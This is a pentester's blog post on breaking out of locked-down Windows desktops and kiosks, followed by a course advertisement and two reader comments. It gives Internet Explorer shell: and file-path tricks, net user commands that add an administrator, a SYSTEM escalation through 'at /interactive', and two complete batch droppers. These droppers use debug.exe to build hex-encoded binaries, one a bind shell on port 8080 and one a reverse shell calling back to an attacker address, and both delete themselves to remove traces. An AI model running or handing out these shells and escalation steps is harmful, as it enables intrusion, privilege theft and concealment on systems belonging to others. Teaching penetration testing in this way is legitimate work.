Bypassing Restricted Environments

I just got an email from an old student that is doing a pentest and he asked me about pentesting restricted environments like locked down desktops, citrix, kiosks, etc. I figured I'd put together a blog post on the subject and if people like it I'll do some more blog posts that go deeper into the subject and cover things like bypassing Software Restriction Policy (SRP) and breaking out of sandboxes. So here goes.....

 

Windows Environments

There are a lot of different ways to lock down a Windows environment.  Probably the most widely used method is through Group Policy.  Group Policy is basically a set of rules that govern the environment (restriction of access to certain programs, tools, folders etc.).

 

Opening Windows folders with Internet Explorer

Chances are most key programs and functions that would allow any sort of noteworthy access are blocked in a corporate or public environment.  Luckily though, 99% of the time, Internet Explorer is not blocked due to it being a vital part of business functionality.  Here, we will use the Shell handler to access Windows folders through Internet Explorer.  Basically, if you enter a certain string into the URL bar of IE, an instance of explorer.exe will spawn and browse to the specified folder.  Note that these will work with Internet Explorer ONLY.

 

Here are some examples of different commands:

shell:profile: This command will open up the User Profile for whatever account you are logged in as.

image001

 

 

 

shell:programfiles: Here, the command will open up the Program Files folder.

image002

 

shell:system:  Here, we can open up the system32 folder.

image003

 

 

shell:controlpanelfolder:  This command opens up the Control Panel.

image004

 

 

shell:windows: Finally, we can open up the WINDOWS folder with this command.

image005

 

Another way to navigate to the Control Panel folder is by entering the following command into the URL bar:         shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}

image006

 

 

 

Accessing cmd.exe through the Microsoft Help and Support Center (this works on win xp and win 2003 not on windows 7)

If access to cmd.exe through ordinary means has been disabled, there is another way of access it.  This technique utilizes the Help and Support Center to spawn a command prompt for user interaction.  To do this, simply enter the following command into the URL bar in Internet Explorer:

 

HCP:// Help And Support Center

image007

As you can see, the Help and Support Center window has spawned.  Next, type “Command Prompt” into the search bar and hit enter.  On the left-hand side of the window under Suggested Topics, you will see a result called “Using Command Prompt”, click it.

 

image008

 

Finally, click on the highlighted link named “Command Prompt” and voila, you have a shell!

image009

 

Show me some love and tweet this
Tweet: Check out a cool blog post from @j0emccray on Bypassing Restricted Environments.Bypassing Restricted Environments

 

 

Defeating Blacklists

In some cases, Windows Explorer will have been completely blacklisted. You may not be able to get to it from the Start Menu.  Again, we can use Internet Explorer to spawn an explorer.exe window and have it navigate to a specific file location.  Here is an example of this relatively simple technique:

By typing C:\windows into the URL bar, we can access the WINDOWS folder on the C: drive

image010

 

In certain situations, C:\windows may be blocked, luckily though, you can substitute any of these commands.  Simply enter any of these into the URL bar to achieve the same result:

File:/C:/windows

File:/C:\windows\

File:/C:\windows/

File:/C:/windows

File://C:/windows

File://C:\windows/

file://C:\windows

C:/windows

 C:/windows/

C:/windows\

%WINDIR%

 

 

Using the same technique, you can also enter other commands into the URL bar and jump to different file locations:

 

Command                              Jumps to

-------------                               -----------

%TMP%                                 C:\Documents and Settings\Administrator\Local Settings\Temp

%TEMP%                              C:\Documents and Settings\Administrator\Local Settings\Temp

%SYSTEMDRIVE%              C:\

%SYSTEMROOT%               C:\WINDOWS

%APPDATA%                        C:\Documents and Settings\Administrator\Application Data

%HOMEDRIVE%                 C:\

%HOMESHARE%                Fully qualified path to your server based profile

 

 

Create a new user and add them to the Administrators Group

This is a simple task, it consists of 2 commands.  The syntax of creating a new user is net user *whatever username you want* *whatever password* /add.  The syntax of then adding a user to a certain group is net user localgroup *whatever group you want to add the user to* *the user you wish to add* /add.  So in this example, we will be creating a user called secure and have their password be ninja, then adding that user to the Administrators group:

image011

 

 

Simple privilege escalation (doesn't work in Win 7 and above)

Here, we are going to go from a standard Administrator account up to a system level account with a few simple tricks.  First off, on a standard user account, open up a command prompt and type “at”.  If the command errors out then you know that this escalation technique will not work, but if it comes back and tells you “There are no entries in the list”, then this method is sure to work for you:

 

image012

 

So, now that we know this will work, what we need to do is schedule a job.  Here, we are going to schedule an interactive command shell to spawn:

 

at 20:10 /interactive "cmd.exe"

or

SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10

 

image013

 

After the shell has been spawned, notice at the title bar that it is not called cmd.exe, but called svchost.exe, that is because it was spawned by the task scheduler service which runs under the Local System account:

image014

 

Now that we have a command shell running with system privileges, let’s shed this user environment.  Go ahead and Ctrl+Alt+Delete to the task manager and under the processes tab, find explorer.exe and kill the process:

image015

 

You will notice that the desktop has disappeared.  Next go back to the system command shell and type in “explorer.exe”.  This will spawn a new desktop environment, which because it was spawned from a system level command shell, will be a system level environment:

image016

 

 

Creating a program that binds a shell to a port using a batch file

Here we are going to use a batch file to create an executable that binds a command shell to a specified port.  This is nice because it is relatively quick and all you have to do is run the batch file; the rest is automatic.  So, before we get started let’s have a look at the code:

 

 

echo off && echo n 1.dll >123.hex && echo e 0100 >>123.hex

echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 67 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00  >>123.hex

echo e 0180 >>123.hex && echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 63 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >>123.hex

echo e 0200 >>123.hex && echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 77 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13  >>123.hex

echo e 0280 >>123.hex && echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00  >>123.hex

echo e 0300 >>123.hex && echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 38 42 00 00 45 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c fa 31 40 03 6a 01 e8 fc 86 02 f9 f5 30 ba 18 fc fb bf 14 b2 c7 1f 6a 91 02 06 bd 3c 0c 02 e8 b0 23 a3 60 f6 59 66 c7 05 58 ce 4f 02 15 3a 19 e8 d8 5d 50 d9 aa 86 3d 66 a3 5a 31 c8 3c 5c a0 01 14 6a 10 68 29 14 ff 35 36 14 e8 82 12 29 05 0d 94 81 5e d0 0f ca  >>123.hex

echo e 0380 >>123.hex && echo 60 5c c5 a1 1e 05 88 3c 30 be c2 2a 44 51 45 04 ea 2d 14 fe 28 9f 42 68 48 93 a9 45 31 46 fb 28 e1 08 a5 8b 0b 85 46 14 e8 26 5f 07 c3 cc ff 25 20 1a 81 bb 2a 14 06 43 0c 21 1c 90 18 c8 10 64 04 4e cc 20 55 8b ec 81 c4 3f 7c fe f1 0c 56 57 e8 3a c7 89 03 45 fc 33 c9 8b 75 a9 ac 3c c0 74 07 e8 22 f2 f7 03 41 eb f4 51 d1 e9 90 e1 58 3b 01 c1 74 0b 5f 5e b8 03 10 c9 c2 08 e1 86 49 8d  >>123.hex

echo e 0400 >>123.hex && echo bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 48 f4 9d 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee e7 44 bb 1f 16 a9 ce 11  >>123.hex

echo e 0480 >>123.hex && echo 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 a8 92 52 e1 06 00 00 30 40 00 63 30 6d 64 00 81 3f 40 00 0c 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 61 71 63 1b 65 70 74 10 e1 69 73 db ca 6e 01 57 53 41 cb f9 61 72 f0 75 70 cf 18 68 23 6f 6e 73 1d 0e 62 69 94 64 19  >>123.hex

echo e 0500 >>123.hex && echo 9f c3 63 6b 65 74 bf 06 ff 03 e1 b1 91 1a 72 6e cd 6c 58 4a 47 c3 36 43 6f 6d 8b 61 37 5a 4c 62 cc 4c 80 fc 72 ed f7 3b a8 50 6f 6c ce 73 3b 21 00 00 00 00 00 00 81 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 ec be ff ff 00 00 00 02 00 00 00 0c 40 00 00  >>123.hex

echo r cx >>123.hex && echo 0477 >>123.hex && echo w >>123.hex && echo q >>123.hex && debug<123.hex && copy 1.dll bind.exe

rem *********CHANGE PORT NUMBER HERE******

bind.exe 8080

IF EXIST bind.exe GOTO kill

del %0

 

:kill

 

Most of what’s happening here is that a hex file and DLL are being created.  These 2 files are the building blocks that form bind.exe.  Once created, bind.exe is being executed and begins listening on a port (in this case port 8080, but you can and should change it to whatever port is necessary in the situation).  Once the shell has been bound, the batch file deletes itself and any traces of evidence.

 

Okay so, once we run the batch file, we can see the executable being created (note that if you run it from command prompt, you will see it in action, if you just double-click on the batch file, the command prompt window will open and close very quickly).  Here, it is being run from the command prompt so you can see the output:

image017

 

Next, let’s check out active connections with a netstat /ano command:

image018

 

And there she is, waiting on port 8080.  And just to be sure, let’s do a tasklist:

image019

 

Okay, now that we know the batch file worked, and we can see the bind.exe is running and that it is indeed listening, so let’s hop onto our evil Linux machine and see if we can get access.  We can simple netcat to the target machine (here using 192.168.3.177 as its IP address) and…

image020

 

Success!  We have a shell.  Now all that was done here was send a message to all users logged on to the machine, but I’ll let your imagination run wild with the possibilities of having Administrator access… you evil hacker, you.

 

Sending a reverse shell using a batch file

 

Here we are going to essentially do the same thing as we did in the last exercise, but instead of using the attacker machine to go and connect to the target machine, we are going to have the target machine send a shell to the attacker machine.

 

Let’s take a look at the code:

 

echo off && echo n 2.dll >1234.hex

echo e 0100 >>1234.hex && echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 df 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00  >>1234.hex

echo e 0180 >>1234.hex && echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 db 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >>1234.hex

echo e 0200 >>1234.hex && echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 ef 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13  >>1234.hex

echo e 0280 >>1234.hex && echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00  >>1234.hex

echo e 0300 >>1234.hex && echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 b0 42 00 00 bd 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c 06 32 40 07 6a 01 e8 0e 7c 38 55 0c e8 42 02 c8 15 38 9e 6a 7e 38 ea 53 0c 7a 50 2c 16 74 41 30 fd 01 bf 55 b2 b1 33 6a 91 02 06 b2 7c 55 9a 27 a3 78 83 66 c7 05 64 7b 4f a6 38 67 bc 5d 50 66 94 3d 39 66 a3 68 7e 64 66 7e 21 7d 8b 73 0c d9 0a 6a 68 94 2d a1  >>1234.hex

echo e 0380 >>1234.hex && echo 3a 7a 6f 48 15 ea 4c 05 11 50 64 90 10 4d 44 55 91 14 3c 40 78 6a 28 10 68 5d 28 ff 35 30 74 e8 a4 9e 51 54 55 a1 55 8d bf 6e 0e 0a 08 90 22 0b e1 51 14 e8 1f 81 4b c3 ff 25 24 20 bb 6f 2a 1c 06 43 18 21 14 bd c3 22 08 71 cc 01 55 8b ec 81 c4 7c fe ff 88 56 57 e8 60 ac dd 89 45 fc 33 1d c9 8b 75 7e 38 3c 1d 74 07 1e 22 40 f7 41 eb f4 51 d1 72 e9 00 e1 58 3b c1 74 0b 5f 5e 30 b8 03  >>1234.hex

echo e 0400 >>1234.hex && echo b9 c9 c2 08 e1 86 49 8d bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 38 f4 b0 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee  >>1234.hex

echo e 0480 >>1234.hex && echo e7 44 bb 1f 16 a9 ce 11 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 e2 30 83 c4 07 f4 6a f5 e8 69 09 19 49 ff bd 82 aa 20 0b d0 2a 93 75 37 f8 50 22 9d 29 86 06 fc e8 4d 2f 68 8b 24 38 e6 53 1a 0f 08 8d 50 03 21 18 83 c0 04 e3 f9 ff fe 80 02 f7 d3 23 cb 81 e1 44 80 74  >>1234.hex

echo e 0500 >>1234.hex && echo 7c e9 6c c1 0c 60 75 77 06 f4 10 c0 40 02 d0 e1 1b c2 51 5b 3a 47 c4 49 19 ca 0c 57 06 08 30 00 00 30 40 00 63 30 6d 64 00 66 3f 40 00 14 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 67 07 65 74 68 6f 73 40 62 79 6e 61 7b 6d cf 1e 63 9e 3c f7 eb ff 0e 12 57 53 41 5d cf 61 72 46 75 70 18 79 68 ca 2c 73 13 4f 26 63 6b 62 ef c1 ff b8 03 6c 95 1a 72 ca 5e 6c 4c c7 57 d3 69 74 f3 46  >>1234.hex

echo e 0580 >>1234.hex && echo a7 bc 91 47 c3 4c 43 6f 6d 88 61 6e 64 36 4c 69 44 62 7e 80 76 72 fb 9d 3a 50 b7 82 e7 73 15 41 58 21 c0 64 48 d0 43 2f 60 00 00 00 00 00 66 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 74 be ff ff 00 00 00 02 00 00 00 0c 40 00 00  >>1234.hex

echo r cx >>1234.hex && echo 04ef >>1234.hex && echo w >>1234.hex && echo q >>1234.hex && debug<1234.hex && copy 2.dll reverse.exe && del 2.dll && del 1234.hex

rem *******************EDIT YOUR HOSTNAME AND PORT HERE*************************

reverse.exe 192.168.2.18 31337

deleteit:

del reverse.exe

IF EXIST reverse.exe GOTO kill

del %0

 

:kill

image021

The code looks very similar to bind.bat from the last exercise.  Essentially this is doing the same thing, creating a hex file and DLL file that build an executable.  The program is then run (and subsequently the shell sent) and then is deleted.

 

First off, we need to set our evil hacker box to listen on a port, let’s choose 31337 for this exercise.  We will be using netcat again (isn’t it a wonderful tool) to listen on port 31337:

image022

Next, we simply run the batch file on the target machine:

image023

And like clockwork, there is our shell!

image024

 

 

 

 

Escaping and getting a command prompt

 

First things first, we need a command prompt before we can do anything else.  Let’s navigate to the task manager using Ctrl+Alt+Delete.  Next, go to File > New Task (Run…) and type in cmd.exe.  That will spawn a new command prompt (also if there is no physical keyboard present, you can start a new task and type in “osk.exe” for an onscreen keyboard):

image026

 

Here is an image of the On-Screen Keyboard:

image027

 

Next, use Internet Explorer (or whatever browser they have installed, but there is a good chance it is IE) to navigate to a website that hosts your favorite tools and exploits. Whew…well alrighty then... I hope that you enjoyed this blog post.

I'd love it if you check out the Metasploit Next Level Video Series for only $50:

http://strategicsec.com/product/metasploit-next-level-video-series/

 

Let’s call it quits right there, and I’ll come back in a day or so and give you something else to chew on.

 

Show me some love and tweet this
Tweet: Check out a cool blog post from @j0emccray on Bypassing Restricted Environments.Bypassing Restricted Environments

 

Happy Hacking

The following two tabs change content below.
CEO/Founder at Strategic Security "I love helping people, I love my family, I love basketball, I love teaching, and you all know that I love rum and coke."  

2 Responses

  1. John Pickering
    great post! Always really useful in this arena to learn some step by step exploits versus the hypothetical information we always seem to get. Had a chance to take your pen testing class. It was the first at iteration and I am looking to take it again, as there were many problems with the first run, but I love that you are willing to share info! Keep it going! Thanks!
  2. Ahmed Sadat
    Great post, looking forward to the follow up.

Leave a comment